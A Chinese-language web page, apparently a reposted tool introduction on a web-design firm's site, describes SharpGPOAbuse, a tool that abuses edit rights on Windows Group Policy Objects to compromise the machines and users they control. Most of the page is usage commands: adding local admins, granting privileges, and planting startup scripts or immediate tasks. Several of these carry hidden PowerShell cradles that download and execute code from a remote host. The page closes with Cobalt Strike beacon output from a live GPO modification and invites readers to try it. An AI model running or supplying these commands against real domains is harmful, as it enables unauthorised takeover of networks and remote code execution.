怎么通過用戶的編輯權(quán)限控制組策略對象控制對象

本篇內(nèi)容主要講解“怎么通過用戶的編輯權(quán)限控制組策略對象控制對象”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強(qiáng)。下面就讓小編來帶大家學(xué)習(xí)“怎么通過用戶的編輯權(quán)限控制組策略對象控制對象”吧!

站在用戶的角度思考問題,與客戶深入溝通,找到利辛網(wǎng)站設(shè)計與利辛網(wǎng)站推廣的解決方案,憑借多年的經(jīng)驗,讓設(shè)計與互聯(lián)網(wǎng)技術(shù)結(jié)合,創(chuàng)造個性化、用戶體驗好的作品,建站類型包括:網(wǎng)站制作、做網(wǎng)站、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣、域名與空間、網(wǎng)頁空間、企業(yè)郵箱。業(yè)務(wù)覆蓋利辛地區(qū)。

關(guān)于SharpGPOAbuse

SharpGPOAbuse是一個功能強(qiáng)大的.NET應(yīng)用程序,SharpGPOAbuse基于C#開發(fā),可以幫助廣大研究人員利用目標(biāo)系統(tǒng)中用戶針對一個組策略對象(GPO)的編輯權(quán)限來入侵并控制由該組策略對象(GPO)控制的對象。

項目獲取

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/FSecureLABS/SharpGPOAbuse.git

代碼編譯

請確保本地主機(jī)中必要的NuGet包已正常安裝,然后就可以使用Visual Studio將項目導(dǎo)入之后直接編譯構(gòu)建了。

工具使用

Usage:

        SharpGPOAbuse.exe <攻擊類型> <攻擊選項>

攻擊類型

當(dāng)前版本的SharpGPOAbuse支持下列攻擊類型:

選項

描述

--AddUserRights

向用戶添加權(quán)限

--AddLocalAdmin

向本地管理員組中添加一個用戶

--AddComputerScript

添加一個新的計算機(jī)啟動腳本

--AddUserScript

配置一個用戶登錄腳本

--AddComputerTask

配置一個計算機(jī)立即執(zhí)行的任務(wù)

--AddUserTask

向用戶添加一個立即執(zhí)行的任務(wù)

攻擊選項

添加用戶權(quán)限

Options required to add new user rights:

--UserRights

        給用戶添加新的權(quán)限,該參數(shù)大小寫敏感,可以使用逗號分隔的列表。

--UserAccount

        設(shè)置需要添加新權(quán)限的用戶賬號。

--GPOName

        存在安全漏洞的GPO名稱。

        

樣例:

        SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"

添加一個本地管理員

Options required to add a new local admin:

--UserAccount

        設(shè)置需要添加進(jìn)本地管理員組中的賬號名稱。

--GPOName

        存在安全漏洞的GPO名稱。

 

樣例:

        SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

配置一個用戶或計算機(jī)登錄腳本

Options required to add a new user or computer startup script:

--ScriptName

        設(shè)置新啟動腳本的名稱。

--ScriptContents

        設(shè)置新啟動腳本的內(nèi)容。

--GPOName

        存在安全漏洞的GPO名稱。

 

樣例:

        SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

如果你只想要對GPO控制的特定用戶或計算機(jī)執(zhí)行惡意腳本,你可以在惡意腳本中添加一個if語句:

SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

配置計算機(jī)或用戶立即執(zhí)行的任務(wù)

Options required to add a new computer or user immediate task:

 

--TaskName

        設(shè)置新計算機(jī)任務(wù)的名稱。Set the name of the new computer task.

--Author

        設(shè)置新任務(wù)的開發(fā)者(可以使用DA賬號)。

--Command

        需要執(zhí)行的命令

--Arguments

        傳遞給命令的參數(shù)。

--GPOName

        存在安全漏洞的GPO名稱。

 

Additional User Task Options:

--FilterEnabled

        啟用任務(wù)過濾器。Enable Target Filtering for user immediate tasks.

--TargetUsername

        目標(biāo)用戶,惡意任務(wù)只會針對特定用戶運(yùn)行,格式為 <DOMAIN>\<USERNAME>。

--TargetUserSID

        目標(biāo)用戶的SID。

 

Additional Computer Task Options:

--FilterEnabled

        啟用任務(wù)過濾器。

--TargetDNSName

        目標(biāo)DNS名稱,惡意任務(wù)只會針對目標(biāo)主機(jī)運(yùn)行。

        

樣例:

        SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

如果你只想要對GPO控制的特定用戶或計算機(jī)運(yùn)行惡意任務(wù),你可以參照下列命令:

SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com

額外選項

選項

描述

--DomainController

設(shè)置目標(biāo)域控制器

--Domain

設(shè)置目標(biāo)域名

--Force

改寫現(xiàn)有文件

工具輸出樣例

beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"

[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I

EX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"

[+] host called home, sent: 171553 bytes

[+] received output:

[+] Domain = europa.com

[+] Domain Controller = EURODC01.europa.com

[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com

[+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD}

[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml

[+] versionNumber attribute changed successfully

[+] The version number in GPT.ini was increased successfully.

[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.

[+] Done!

到此,相信大家對“怎么通過用戶的編輯權(quán)限控制組策略對象控制對象”有了更深的了解,不妨來實際操作一番吧!這里是創(chuàng)新互聯(lián)網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!

網(wǎng)頁標(biāo)題:怎么通過用戶的編輯權(quán)限控制組策略對象控制對象
文章路徑:http://www.muchs.cn/article10/ijchdo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供營銷型網(wǎng)站建設(shè)、響應(yīng)式網(wǎng)站虛擬主機(jī)、網(wǎng)頁設(shè)計公司、ChatGPT、移動網(wǎng)站建設(shè)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

h5響應(yīng)式網(wǎng)站建設(shè)